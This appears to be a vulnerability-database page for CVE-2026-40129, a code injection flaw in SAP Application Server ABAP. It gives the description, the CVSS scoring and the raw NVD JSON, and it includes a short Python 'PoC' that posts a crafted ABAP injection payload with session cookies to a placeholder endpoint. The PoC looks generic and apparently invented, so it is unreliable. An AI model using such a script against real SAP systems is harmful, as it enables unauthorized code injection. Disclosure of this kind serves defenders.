Security Vulnerability Report
中文
CVE-2026-40129 CVSS 4.3 MEDIUM

CVE-2026-40129

Published: 2026-05-12 03:16:12
Last Modified: 2026-05-12 03:16:12
Source: [email protected]

Description

Due to a Code Injection vulnerability in SAP Application Server ABAP for SAP NetWeaver and ABAP Platform, an authenticated attacker could send specially crafted inputs to the application. If processed by the application, this input could be delivered to users subscribed to the channel and result in execution. Successful exploitation could enable the attacker to execute arbitrary code for other users, resulting in a low impact on the integrity, with no impact to the confidentiality and availability of the system.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SAP NetWeaver (Specific versions to be checked in SAP Note 3735359)
SAP ABAP Platform (Specific versions to be checked in SAP Note 3735359)
SAP Application Server ABAP (Specific versions to be checked in SAP Note 3735359)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # SAP Application Server ABAP Code Injection PoC Concept # This script demonstrates how an authenticated attacker might send a crafted payload. # Note: This is a theoretical example for educational purposes. TARGET_URL = "http[s]://<target-host>:<port>/sap/bc/webdynpro_abap/<vulnerable_component>" SESSION_COOKIE = "sap-usercontext=<context>; MYSAPSSO2=<token>" # The payload attempts to inject ABAP code that may be executed when processed by the channel. # Example: Simple command execution or data modification payload. PAYLOAD = "test_data'); WRITE: / 'Injected Code via CVE-2026-40129'. ." headers = { "Cookie": SESSION_COOKIE, "User-Agent": "Mozilla/5.0 (Compatible; PoC-Analyzer)", "Content-Type": "application/x-www-form-urlencoded" } data = { "channel_input": PAYLOAD, "submit": "Submit" } try: response = requests.post(TARGET_URL, headers=headers, data=data, verify=False) if response.status_code == 200: print("[+] Payload sent successfully. Check the subscribed channel for execution results.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40129", "sourceIdentifier": "[email protected]", "published": "2026-05-12T03:16:11.783", "lastModified": "2026-05-12T03:16:11.783", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to a Code Injection vulnerability in SAP Application Server ABAP for SAP NetWeaver and ABAP Platform, an authenticated attacker could send specially crafted inputs to the application. If processed by the application, this input could be delivered to users subscribed to the channel and result in execution. Successful exploitation could enable the attacker to execute arbitrary code for other users, resulting in a low impact on the integrity, with no impact to the confidentiality and availability of the system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://me.sap.com/notes/3735359", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.